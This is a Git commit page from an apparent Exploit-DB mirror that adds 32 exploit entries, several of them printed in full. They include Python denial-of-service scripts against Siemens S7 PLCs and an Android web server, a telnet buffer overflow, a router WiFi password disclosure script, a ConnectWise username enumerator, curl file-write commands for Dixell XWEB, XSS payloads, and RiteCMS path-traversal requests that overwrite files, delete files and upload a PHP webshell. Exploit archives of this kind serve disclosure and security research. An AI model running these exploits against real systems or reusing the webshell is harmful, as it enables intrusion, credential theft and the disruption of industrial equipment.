bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-01-06

Browse source 
32 changes to exploits/shellcodes

Siemens S7 Layer 2 - Denial of Service (DoS)
TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
Automox Agent 32 - Local Privilege Escalation
ConnectWise Control 19.2.24707 - Username Enumeration
Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
AWebServer GhostBuilding 18 - Denial of Service (DoS)
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
Dixell XWEB 500 - Arbitrary File Write
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
CMSimple 5.4 - Cross Site Scripting (XSS)
RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
Nettmp NNT 5.1 - SQLi Authentication Bypass
Hostel Management System 2.1 - Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
Hospitals Patient Records Management System 1.0 - Account TakeOver
Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
openSIS Student Information System 8.0 - 'multiple' SQL Injection
Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
This commit is contained in:
Offensive Security 2022-01-06 05:01:54 +00:00
parent 00cc9f489e
commit 1472d8e723
33 changed files with 1988 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

85
exploits/android/remote/50629.py Executable file
View file

@ -0,0 +1,85 @@
# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)
# Date: 28/12/2021
# Exploit Author: Andres Ramos [Invertebrado]
# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm
# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en
# Version: AWebServer GhostBuilding 18
# Tested on: Android
#!/usr/bin/python3
# *********************************************************************************
# * Author: Andres Ramos [Invertebrado] *
# * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash *
# *********************************************************************************
import signal
import requests
from pwn import *
#Colors
class colors():
GREEN = "\033[0;32m\033[1m"
END = "\033[0m"
RED = "\033[0;31m\033[1m"
BLUE = "\033[0;34m\033[1m"
YELLOW = "\033[0;33m\033[1m"
PURPLE = "\033[0;35m\033[1m"
TURQUOISE = "\033[0;36m\033[1m"
GRAY = "\033[0;37m\033[1m"
exit = False
def def_handler(sig, frame):
print(colors.RED + "\n[!] Exiting..." + colors.END)
exit = True
sys.exit(0)
if threading.activeCount() > 1:
os.system("tput cnorm")
os._exit(getattr(os, "_exitcode", 0))
else:
os.system("tput cnorm")
sys.exit(getattr(os, "_exitcode", 0))
signal.signal(signal.SIGINT, def_handler)
if len(sys.argv) < 3:
print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)
sys.exit(1)
url = sys.argv[1]
Tr = sys.argv[2]
def http():
counter = 0
p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)
while True:
r = requests.get(url)
r = requests.get(url + "/mysqladmin")
counter += 2
p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)
if exit:
break
if __name__ == '__main__':
threads = []
try:
for i in range(0, int(Tr)):
t = threading.Thread(target=http)
threads.append(t)
sys.stderr = open("/dev/null", "w")
for x in threads:
x.start()
for x in threads:
x.join()
except Exception as e:
log.failure(str(e))
sys.exit(1)

105
exploits/hardware/dos/50613.py Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs
#!/usr/bin/python3
from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re
# Banner
print(Fore.RED + r"""
· ·. ·
· ·
. · .
·. ·.
.
. ·. ·
.· ·· ·
. ·· .
· ·.
. .
""")
time.sleep(1.5)
# Get IP to exploit
IP = input("Enter the IP address of the device to exploit: ")
# Find the mac address of the device
Mac = getmacbyip(IP)
# Function to send the ouput to "nothing"
def NULL ():
f = open(os.devnull, 'w')
sys.stdout = f
# Eternal loop to produce DoS condition
def Arnold ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
def Sarah ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
def Kyle ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()
# Sarah
SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()
# Kyle
KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()

41
exploits/hardware/remote/50620.py Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 22/12/2021
# Vendor Homepage: https://www.accu-time.com/
# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/
# Tested Version: 1.0
# Vulnerability Type: Buffer Overflow (DoS) Remote
# Tested on OS: linux
# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow
# Steps to reproduce:
# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23
# 2. - Run the Script from remote PC/IP
# 3. - Telnet Crashed
#!/usr/bin/env python3
import socket
import sys
print("#######################################################")
print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #")
print("# -------------------------- #")
print("# BY Yehia Elghaly #")
print("#######################################################")
if (len(sys.argv)<2):
print ("Usage: %s <Target Host> ") % sys.argv[0]
print ("Example: %s 192.168.113.1 ") % sys.argv[0]
exit(0)
print ("\nSending Evil.......Buffer...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1], 23))
buffer = "A"*9400
s.send(" Crashed Check the connection")
Print ("Crashed")
except:
print ("Could not connect to ACCU Time Telnet!")

29
exploits/hardware/remote/50639.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
# Google Dork: inurl:"xweb500.cgi"
# Date: 03/01/2022
# Exploit Author: Roberto Palamaro
# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
# Version: XWEB-500
# Tested on: Dixell XWEB-500
# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability
# Endpoint: logo_extra_upload.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
# Write file
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -is "http://[target]:[port]/logo/"
# Endpoint: lo_utils.cgi
# Here ACTION=5 is to enable write mode
echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify using ACTION=3 to listing resources
echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Endpoint: cal_save.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi

27
exploits/hardware/webapps/50636.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Date: 01/01/2022
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.vodafone.es/
# Software Link: N/A
# Version: Firmware version Vodafone-H-500-s-v3.5.10
# Hardware model: Sercomm VFH500
# The WiFi access point password gets disclosed just by performing a GET request with certain headers
import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
sys.exit()
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}
req=requests.get(url, headers=headers, cookies=cookies)
result=json.loads(req.text)[3].get("wifi_password")
print("[+] The wifi password is: "+result)

178
exploits/multiple/remote/50618.py Executable file
View file

@ -0,0 +1,178 @@
# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration
# Date: 17/12/2021
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://www.connectwise.com/
# Version: vulnerable <= 19.2.24707
# CVE : CVE-2019-16516
# https://github.com/czz/ScreenConnect-UserEnum
from multiprocessing import Process, Queue
from statistics import mean
from urllib3 import exceptions as urlexcept
import argparse
import math
import re
import requests
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
headers = []
def header_function(header_line):
headers.append(header_line)
def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy):
try:
# Payload to dictionary
payload_dict = {}
for load in payload:
split_load = load.split(":")
if split_load[1] != '{USER}':
payload_dict[split_load[0]] = split_load[1]
else:
payload_dict[split_load[0]] = '{USER}'
# Enumeration
total = len(wordlist)
for counter, user in enumerate(wordlist):
user_payload = dict(payload_dict)
for key, value in user_payload.items():
if value == '{USER}':
user_payload[key] = user
dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]
headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)
x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items())
if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')):
queue.put((proc_id, "FOUND", user))
found_queue.put((proc_id, "FOUND", user))
if stop: break
elif verbose:
queue.put((proc_id, "TRIED", user))
queue.put(("PERCENT", proc_id, (counter/total)*100))
except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):
print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id))
if __name__ == "__main__":
# Arguments
parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool")
parser.add_argument("url", help="http://example.com/Login")
parser.add_argument("wordlist", help="username wordlist")
parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems")
parser.add_argument("-v", action="store_true", help="verbose mode")
parser.add_argument("-s", action="store_true", help="stop on first user found")
parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050")
args = parser.parse_args()
# Arguments to simple variables
wordlist = args.wordlist
url = args.url
payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']
verbose = args.v
thread_count = args.c
failstr = "PasswordInvalid"
stop = args.s
proxy= args.p
print(bcolors.HEADER + """
__ ___ __ ___
| | |__ |__ |__) |__ |\ | | | |\/|
|__| ___| |___ | \ |___ | \| |__| | |
ScreenConnect POC by czz78 :)
"""+ bcolors.ENDC);
print("URL: "+url)
print("Payload: "+str(payload))
print("Fail string: "+failstr)
print("Wordlist: "+wordlist)
if verbose: print("Verbose mode")
if stop: print("Will stop on first user found")
proxies = {'http': '', 'https': ''}
if proxy:
proxies = {'http': proxy, 'https': proxy}
print("Initializing processes...")
# Distribute wordlist to processes
wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or utf-8
tothread = 0
wllist = [[] for i in range(thread_count)]
for user in wlfile:
wllist[tothread-1].append(user.strip())
if (tothread < thread_count-1):
tothread+=1
else:
tothread = 0
# Start processes
tries_q = Queue()
found_q = Queue()
processes = []
percentage = []
last_percentage = 0
for i in range(thread_count):
p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy))
processes.append(p)
percentage.append(0)
p.start()
print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC)
# Main process loop
initial_count = len(processes)
while True:
# Read the process output queue
try:
oldest = tries_q.get(False)
if oldest[0] == 'PERCENT':
percentage[oldest[1]] = oldest[2]
elif oldest[1] == 'FOUND':
print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
elif verbose:
print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
except: pass
# Calculate completion percentage and print if /10
total_percentage = math.ceil(mean(percentage))
if total_percentage % 10 == 0 and total_percentage != last_percentage:
print("{}% complete".format(total_percentage))
last_percentage = total_percentage
# Pop dead processes
for k, p in enumerate(processes):
if p.is_alive() == False:
processes.pop(k)
# Terminate all processes if -s flag is present
if len(processes) < initial_count and stop:
for p in processes:
p.terminate()
# Print results and terminate self if finished
if len(processes) == 0:
print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC)
while True:
try:
entry = found_q.get(False)
print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC)
except:
break
quit()

40
exploits/multiple/webapps/50632.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Google Dork: intext:"BeyondTrust" "Redistribution Prohibited"
# Date: 30/12/2021
# Exploit Author: Malcrove
# Vendor Homepage: https://www.beyondtrust.com/
# Version: v6.0 and earlier versions
Summary:
Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
Vulnerability Details:
Affected Endpoint: /appliance/login
Affected Parameter: login[password]
Request Method: GET or POST
Proof of concept (POC):
By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain.
http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
Mitigation:
A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version.
- Time-Line:
April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust)
April 8, 2021: Recevied an initial reply from the vendor
Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1
Dec 30, 2021: The Responsible public disclosure
- Credits
Ahmed Aboul-Ela (Malcrove)

30
exploits/php/webapps/50612.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os
[Description]
Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding.
So the application let's attacker perform DOM based XSS.
[Payload and POC]
File > images > Upload a file
Attack vector >> ')-alert(1)// (need to encode)>>
&#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;
When the victim clicks the delete button,an alert will be executed.
Script to encode the payload
payload = input()
finalpayload = ""
for i in payload:
finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)

110
exploits/php/webapps/50614.txt Normal file
View file

@ -0,0 +1,110 @@
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root.
############################################################
# PoC to overwrite existing index.php to display phpinfo() #
############################################################
Steps to Reproduce:
1. Login as admin
2. Go to File Manager
3. Then, click Upload file > Browse..
4. Upload any file and click checkbox name "overwrite file with same name"
4. Intercept the request and replace current file name to any files path on the server via parameter "file_name".
PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php"
param filename - with the content of "<?php phpinfo(); ?>"
Request:
========
POST /ritecmsv3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298
Content-Length: 1840
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="mode"
filemanager
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file"; filename="anyfile.txt"
Content-Type: application/octet-stream
content of the file to overwrite here
-- this is example to overwrite index.php to display phpinfo --
<?php phpinfo(); ?>
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="directory"
media
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file_name"
../index.php
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="overwrite_file"
true
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_mode"
1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize_xy"
x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize"
640
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="compression"
80
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize_xy"
x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize"
150
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_compression"
70
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_file_submit"
OK - Upload file
-----------------------------351719865731412638493510448298--

53
exploits/php/webapps/50615.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
#####################################################
# PoC to delete secretConfig.conf file in web root #
#####################################################
Steps to Reproduce:
1. Login as admin
2. Go to File Manager
3. Delete any file
4. Intercept the request and replace current file name to any files on the server via parameter "delete".
# Assumed there is a secretConfig.conf file in web root
PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"
Request:
========
GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

143
exploits/php/webapps/50616.txt Normal file
View file

@ -0,0 +1,143 @@
# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Google Dork: intext:"Powered by RiteCMS"
# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597
"""
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default.
# There are 4 ways of bypassing the current file upload protection to achieve remote code execution.
# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved
# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved
# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved
By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability.
Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root
body= Content-Disposition: form-data; name="file_name"
body= ../webrootExec.php
So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php
# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved
$ cat .htaccess
<Files *.php>
deny from all
</Files>
<Files ~ "webshell\.php$">
Allow from all
</Files>
###################################
# PoC for webshell using Method 2 #
###################################
Steps to Reproduce:
1. Login as admin
2. Go to Files Manager
3. Choose a directory to upload .php file either media or files directory.
4. Then, click Upload file > Browse..
3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess
4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory
Request:
========
POST /ritecms.v3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309
Content-Length: 1744
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="mode"
filemanager
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file"; filename="webshell.pHp"
Content-Type: application/octet-stream
<?php system($_GET[base64_decode('Y21k')]);?>
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="directory"
media
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file_name"
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_mode"
1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize_xy"
x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize"
640
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="compression"
80
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize_xy"
x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize"
150
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_compression"
70
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_file_submit"
OK - Upload file
-----------------------------410923806710384479662671954309--
####################
# Webshell access: #
####################
# Webshell access via:
PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id
# Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""

84
exploits/php/webapps/50617.txt Normal file
View file

@ -0,0 +1,84 @@
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: gx1 <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone
# Vendor Homepage: https://www.crmperks.com/
# Software Link: https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.1.7
# Tested on: any
# References:
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/
# Description:
Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting
# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user:
===============================================================================================================
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database.
# Proof Of Concept:
Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
